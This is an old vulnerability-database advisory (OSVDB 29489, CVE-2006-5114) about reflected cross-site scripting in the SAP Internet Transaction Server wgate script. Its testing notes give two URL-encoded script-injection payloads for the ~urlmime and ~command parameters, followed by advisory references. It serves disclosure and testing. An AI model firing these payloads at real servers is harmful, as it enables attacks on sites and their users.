SAP Internet Transaction Server wgate Multiple Variable XSS

2006-09-28T17:04:11
ID OSVDB:29489
Type osvdb
Reporter OSVDB
Modified 2006-09-28T17:04:11

Description

Manual Testing Notes

http://[target]/scripts/wgate/!?~urlmime=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cimg%20src=%22

http://[target]/scripts/wgate/!?~command=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cimg%20src=%22

References:

Secunia Advisory ID:22171 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0467.html FrSIRT Advisory: ADV-2006-3894 CVE-2006-5114 Bugtraq ID: 20244